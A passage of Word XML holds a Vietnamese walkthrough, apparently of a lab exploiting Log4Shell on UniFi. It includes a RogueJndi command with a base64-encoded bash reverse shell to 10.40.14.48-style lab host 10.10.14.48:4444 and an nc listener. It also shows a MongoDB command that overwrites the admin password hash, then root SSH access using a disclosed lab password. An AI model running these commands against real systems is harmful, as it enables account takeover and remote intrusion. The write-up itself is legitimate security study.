      <w:r w:rsidR="00F42BCB" w:rsidRPr="00F42BCB">
        <w:t>chủ LDAP giả mạo</w:t>
      </w:r>
      <w:r w:rsidR="00F42BCB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546D7D">
        <w:t xml:space="preserve">với câu lệnh cmd </w:t>
      </w:r>
      <w:r w:rsidR="00270A1B">
        <w:t>in ra chuỗi base64 vừa xong rồi giải mã nó và thực thi để thực hiện tạo reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="008B4981">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B4981" w:rsidRPr="008B4981">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008B4981" w:rsidRPr="008B4981">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pI</w:t>
      </w:r>
      <w:r w:rsidR="008B4981" w:rsidRPr="008B4981">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B4981" w:rsidRPr="008B4981">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>D4mL2Rldi90Y3AvMTAuMTAuMTQuNDgvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.48"</w:t>
      </w:r>
      <w:r w:rsidR="008B4981">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00270A1B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29948B4D" w14:textId="2EF4A17D" w:rsidR="00D4165F" w:rsidRDefault="00D4165F">
      <w:r w:rsidRPr="00D4165F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79E412D9" wp14:editId="22745BB5">
            <wp:extent cx="5731510" cy="3580765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="92290623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906237" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3580765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04D09D" w14:textId="5C4122F7" w:rsidR="00D4165F" w:rsidRDefault="008235C6">
      <w:r>
        <w:t xml:space="preserve">Sau </w:t>
      </w:r>
      <w:r w:rsidR="00E916BA">
        <w:t xml:space="preserve">đó dùng nc để </w:t>
      </w:r>
      <w:r w:rsidR="00B531B7">
        <w:t>lắng nghe trên cổng 4444 và chờ shell của máy lab được gửi về:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D78BC1" w14:textId="1E95A3C2" w:rsidR="00D4165F" w:rsidRDefault="00D4165F">
      <w:r w:rsidRPr="00D4165F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB803FE" wp14:editId="6CB38A97">
            <wp:extent cx="5731510" cy="765810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16779211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921192" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="765810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6A9E3F" w14:textId="0EDF6CCB" w:rsidR="00B531B7" w:rsidRDefault="00B531B7">
      <w:r>
        <w:t>Lấy được shell thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E675A8" w14:textId="0F682006" w:rsidR="005046B1" w:rsidRDefault="005046B1">
      <w:r w:rsidRPr="005046B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A13217" wp14:editId="67825A0D">
            <wp:extent cx="5731510" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14807288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728854" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF28D2" w14:textId="68428BBE" w:rsidR="00F43DF8" w:rsidRDefault="00F43DF8">
      <w:r>
        <w:t>Thực hiện nâng cấp shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAFCD79" w14:textId="13ED58CC" w:rsidR="00D71F53" w:rsidRDefault="00D71F53">
      <w:r w:rsidRPr="00D71F53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1374412F" wp14:editId="6DF56EF4">
            <wp:extent cx="5268060" cy="504895"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="592610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610111" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5268060" cy="504895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB060A2" w14:textId="5C19F6D0" w:rsidR="00F43DF8" w:rsidRDefault="00F43DF8">
      <w:r>
        <w:t xml:space="preserve">Liệt kê các tiến trình trong hệ </w:t>
      </w:r>
      <w:r w:rsidR="009F157E">
        <w:t>thống, t</w:t>
      </w:r>
      <w:r w:rsidR="009F157E">
        <w:t xml:space="preserve">heo như gợi ý từ lab, có thể khai thác qua </w:t>
      </w:r>
      <w:r w:rsidR="0016339F">
        <w:t>dịch</w:t>
      </w:r>
      <w:r w:rsidR="009F157E">
        <w:t xml:space="preserve"> vụ mongodb trên hệ thống</w:t>
      </w:r>
      <w:r w:rsidR="0016339F">
        <w:t xml:space="preserve"> chứa Unifi</w:t>
      </w:r>
      <w:r w:rsidR="009F157E">
        <w:t>. Vì vậy thực hiện kiểm tra và phát hiện dịch vụ đang chạy ở cổng 27117</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A590E23" w14:textId="013CCCEE" w:rsidR="000071B4" w:rsidRDefault="000071B4">
      <w:r w:rsidRPr="000071B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="148E693B" wp14:editId="0B3A6927">
            <wp:extent cx="5731510" cy="1532255"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="142141360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413604" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1532255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A925266" w14:textId="1B766965" w:rsidR="009F157E" w:rsidRDefault="009F157E">
      <w:r>
        <w:t xml:space="preserve">Tiếp đó, tìm kiếm </w:t>
      </w:r>
      <w:r w:rsidR="0016339F">
        <w:t xml:space="preserve">thông tin về cài đặt mặc định của mongodb trên UniFi và phát hiện port của dịch vụ </w:t>
      </w:r>
      <w:r w:rsidR="00E42BB1">
        <w:t>cũng ở 27117 và có user mặc định là ace:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA4F7F1" w14:textId="2739C1B5" w:rsidR="00E67F7F" w:rsidRDefault="00E67F7F">
      <w:r w:rsidRPr="00E67F7F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DC90A01" wp14:editId="1A6CFCB9">
            <wp:extent cx="5731510" cy="3938954"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="10646758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675848" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="1632"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3938954"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="687FD1A5" w14:textId="7C9AD098" w:rsidR="00E42BB1" w:rsidRDefault="00E42BB1">
      <w:r>
        <w:t>Thực hiện truy cập vào mongodb với user mặc định:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3774B00B" w14:textId="29A8B5F5" w:rsidR="00863832" w:rsidRDefault="00863832">
      <w:r w:rsidRPr="00863832">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4859506B" wp14:editId="51B94367">
            <wp:extent cx="5731510" cy="1467485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1954906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90621" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1467485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB0292" w14:textId="59488505" w:rsidR="002F3717" w:rsidRDefault="00D04B6B">
      <w:r>
        <w:t xml:space="preserve">Sử dụng câu lệnh </w:t>
      </w:r>
      <w:r w:rsidR="002F3717" w:rsidRPr="002F3717">
        <w:t>db.admin.find().forEach(printjson)</w:t>
      </w:r>
      <w:r w:rsidR="004060E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004060E1" w:rsidRPr="004060E1">
        <w:t xml:space="preserve">dùng để truy vấn và hiển thị tất cả các tài liệu trong collection có tên là </w:t>
      </w:r>
      <w:r w:rsidR="004060E1" w:rsidRPr="004060E1">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="004060E1">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516B4B1D" w14:textId="7CBD4001" w:rsidR="002F3717" w:rsidRDefault="002F3717">
      <w:r w:rsidRPr="002F3717">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="034D587C" wp14:editId="10BA3087">
            <wp:extent cx="5731510" cy="2264410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="15803112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311262" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2264410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="347C8D23" w14:textId="77777777" w:rsidR="000844BF" w:rsidRDefault="004060E1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả hiển thị có 1 số thông tin của người dùng bao gồm cả mật khẩu được mã</w:t>
      </w:r>
      <w:r w:rsidR="0022378E">
        <w:t xml:space="preserve"> hóa dạng sha512 được lưu trong file /etc/</w:t>
      </w:r>
      <w:r w:rsidR="000844BF">
        <w:t xml:space="preserve">shadow. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE91E3" w14:textId="70D55AFA" w:rsidR="004060E1" w:rsidRDefault="000844BF">
      <w:r>
        <w:t>Sử dụng openssl để tạo 1 password ở dạng này</w:t>
      </w:r>
      <w:r w:rsidR="0022378E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D77AD" w14:textId="3F2F8E9F" w:rsidR="00BF3DE3" w:rsidRDefault="00BF3DE3">
      <w:r w:rsidRPr="00BF3DE3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E7F4FBE" wp14:editId="625890BE">
            <wp:extent cx="5731510" cy="345440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1677089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089023" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="345440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B8306" w14:textId="77DF506C" w:rsidR="00432524" w:rsidRDefault="0022378E" w:rsidP="00BF3DE3">
      <w:r>
        <w:t xml:space="preserve">Tiếp đó sử </w:t>
      </w:r>
      <w:r w:rsidR="000844BF">
        <w:t xml:space="preserve">dụng lệnh update để thực </w:t>
      </w:r>
      <w:r w:rsidR="00E45D14">
        <w:t>hiện thay đổi mật khẩu của tài khoản thành mật khẩu vừa tạo theo id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC282EE" w14:textId="2F72CF50" w:rsidR="000C0625" w:rsidRPr="00E45D14" w:rsidRDefault="00432524" w:rsidP="00BF3DE3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000844BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("</w:t>
      </w:r>
      <w:r w:rsidR="00CC3C7D" w:rsidRPr="000844BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>68a0862f7b105d1771d63ab0</w:t>
      </w:r>
      <w:r w:rsidRPr="000844BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>")},{$set:{"x_shadow":"</w:t>
      </w:r>
      <w:r w:rsidR="00EB3555" w:rsidRPr="000844BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF0E25" w:rsidRPr="000844BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$6$U64SpX0O2g78X9Xi$BRBRWytjD5Lji4IXtUtjKYq0oOTGeWOpREY3n2fPKx0ozGgWGszQd4bO7i1xyATIE2HO80tq2iFOLJEOt0uq21</w:t>
      </w:r>
      <w:r w:rsidRPr="000844BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"}})'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7935D7" w14:textId="7E4FCB0C" w:rsidR="00CE27BC" w:rsidRDefault="00FF7D63" w:rsidP="00BF3DE3">
      <w:r w:rsidRPr="00FF7D63">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9F6BDC" wp14:editId="38766162">
            <wp:extent cx="5731510" cy="341745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="373988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988052" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId27"/>
                    <a:srcRect t="3896"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="341745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1735DD00" w14:textId="482D914F" w:rsidR="00E45D14" w:rsidRDefault="00E45D14" w:rsidP="00BF3DE3">
      <w:r>
        <w:t xml:space="preserve">Đăng nhập </w:t>
      </w:r>
      <w:r w:rsidR="002915A7">
        <w:t>bằng thông tin vừa sửa đổi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71722C24" w14:textId="48D85882" w:rsidR="00CE27BC" w:rsidRDefault="00CE27BC" w:rsidP="00BF3DE3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E07E9E" wp14:editId="2EC84679">
            <wp:extent cx="5257800" cy="4474845"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="196248308" name="Picture 1"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48308" name="Picture 1" descr="A screenshot of a login screen&#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57800" cy="4474845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC91E4B" w14:textId="749B54A8" w:rsidR="004D0311" w:rsidRDefault="002915A7" w:rsidP="00BF3DE3">
      <w:r>
        <w:t xml:space="preserve">Đăng nhập thành </w:t>
      </w:r>
      <w:r w:rsidR="004D0311">
        <w:t>công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48B0DE" w14:textId="327EEA7B" w:rsidR="004D0311" w:rsidRPr="004D0311" w:rsidRDefault="004D0311" w:rsidP="004D0311">
      <w:r w:rsidRPr="004D0311">
        <w:t xml:space="preserve">UniFi cung cấp cài đặt Xác thực SSH, một chức năng cho phép </w:t>
      </w:r>
      <w:r>
        <w:t>người dùng</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0311">
        <w:t xml:space="preserve"> quản lý </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r w:rsidR="00635662">
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0311">
        <w:t>iểm truy cập khác qua SSH từ bảng điều khiển hoặc thiết bị đầu cuối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2319C345" w14:textId="29CAE3C6" w:rsidR="004D0311" w:rsidRPr="004D0311" w:rsidRDefault="004D0311" w:rsidP="004D0311">
      <w:r w:rsidRPr="004D0311">
        <w:t>Điều hướng đến cài đặt -&gt; trang web và cuộn xuống để tìm cài đặt Xác thực SSH. Xác thực SSH</w:t>
      </w:r>
      <w:r w:rsidR="00635662">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0311">
        <w:t>với mật khẩu root đã được bật</w:t>
      </w:r>
      <w:r w:rsidR="00635662">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidR="00635662" w:rsidRPr="00635662">
        <w:t>NotACrackablePassword4U2022</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0311">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0930C168" w14:textId="77777777" w:rsidR="004D0311" w:rsidRDefault="004D0311" w:rsidP="00BF3DE3"/>
    <w:p w14:paraId="28DA8450" w14:textId="4EFC585D" w:rsidR="00406813" w:rsidRDefault="00406813" w:rsidP="00BF3DE3">
      <w:r w:rsidRPr="00406813">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41D6D9E7" wp14:editId="758122E9">
            <wp:extent cx="5731510" cy="1852930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14634114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411499" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1852930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B9874" w14:textId="7D9A0F9F" w:rsidR="00635662" w:rsidRDefault="00635662" w:rsidP="00BF3DE3">
      <w:r>
        <w:t>Kết nối ssh thành công vào root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C70F829" w14:textId="49F86E81" w:rsidR="000214DA" w:rsidRPr="00292E57" w:rsidRDefault="000214DA" w:rsidP="00BF3DE3">
      <w:r w:rsidRPr="000214DA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB42899" wp14:editId="66F7E5DA">
            <wp:extent cx="5731510" cy="2322830"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="78601733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017331" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2322830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000214DA" w:rsidRPr="00292E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962494"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE9E2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4345305"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72EC3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3860222">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="12001650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209F"/>
    <w:rsid w:val="000071B4"/>
    <w:rsid w:val="000214DA"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="0003383D"/>
    <w:rsid w:val="000604EE"/>
    <w:rsid w:val="000844BF"/>
    <w:rsid w:val="000C0625"/>
    <w:rsid w:val="000C1173"/>
    <w:rsid w:val="000C2C31"/>
    <w:rsid w:val="000E27EA"/>
    <w:rsid w:val="00110871"/>
    <w:rsid w:val="0013553C"/>
    <w:rsid w:val="00141D29"/>
    <w:rsid w:val="0016339F"/>
    <w:rsid w:val="00177CDF"/>
    <w:rsid w:val="001A356A"/>
    <w:rsid w:val="001B4E6E"/>
    <w:rsid w:val="001C139B"/>
    <w:rsid w:val="001D3677"/>
    <w:rsid w:val="0021198C"/>
    <w:rsid w:val="0022378E"/>
    <w:rsid w:val="002620A9"/>
    <w:rsid w:val="00270A1B"/>
    <w:rsid w:val="00280B62"/>
    <w:rsid w:val="00283B12"/>
    <w:rsid w:val="00290C54"/>
    <w:rsid w:val="002915A7"/>
    <w:rsid w:val="00292E57"/>
    <w:rsid w:val="002D6386"/>
    <w:rsid w:val="002F3717"/>
    <w:rsid w:val="00371B10"/>
    <w:rsid w:val="003B0502"/>
    <w:rsid w:val="003E0937"/>
    <w:rsid w:val="004060E1"/>
    <w:rsid w:val="00406813"/>
    <w:rsid w:val="00432524"/>
    <w:rsid w:val="0045778A"/>
    <w:rsid w:val="004A3A24"/>
    <w:rsid w:val="004D0311"/>
    <w:rsid w:val="005046B1"/>
    <w:rsid w:val="005123B6"/>
    <w:rsid w:val="00546D7D"/>
    <w:rsid w:val="00560BC6"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="00613A73"/>
    <w:rsid w:val="00635662"/>
    <w:rsid w:val="00645AD9"/>
    <w:rsid w:val="006757F0"/>
    <w:rsid w:val="00682C31"/>
    <w:rsid w:val="00687F6E"/>
    <w:rsid w:val="006A655A"/>
    <w:rsid w:val="00744A43"/>
    <w:rsid w:val="0074603D"/>
    <w:rsid w:val="008018D8"/>
    <w:rsid w:val="008235C6"/>
    <w:rsid w:val="00837162"/>
    <w:rsid w:val="00863832"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="008B4981"/>
    <w:rsid w:val="00941AA9"/>
    <w:rsid w:val="00996D1C"/>
    <w:rsid w:val="009A7C2A"/>
    <w:rsid w:val="009B2CC8"/>
    <w:rsid w:val="009C03B9"/>
    <w:rsid w:val="009F157E"/>
    <w:rsid w:val="00A2624C"/>
    <w:rsid w:val="00A431B8"/>
    <w:rsid w:val="00A737FF"/>
    <w:rsid w:val="00AF0E25"/>
    <w:rsid w:val="00AF4B7A"/>
    <w:rsid w:val="00B20AC0"/>
    <w:rsid w:val="00B531B7"/>
    <w:rsid w:val="00B655EC"/>
    <w:rsid w:val="00BE1C05"/>
    <w:rsid w:val="00BF3DE3"/>
    <w:rsid w:val="00C04D46"/>
    <w:rsid w:val="00C63F76"/>
    <w:rsid w:val="00C83026"/>
    <w:rsid w:val="00CB6281"/>
    <w:rsid w:val="00CC3C7D"/>
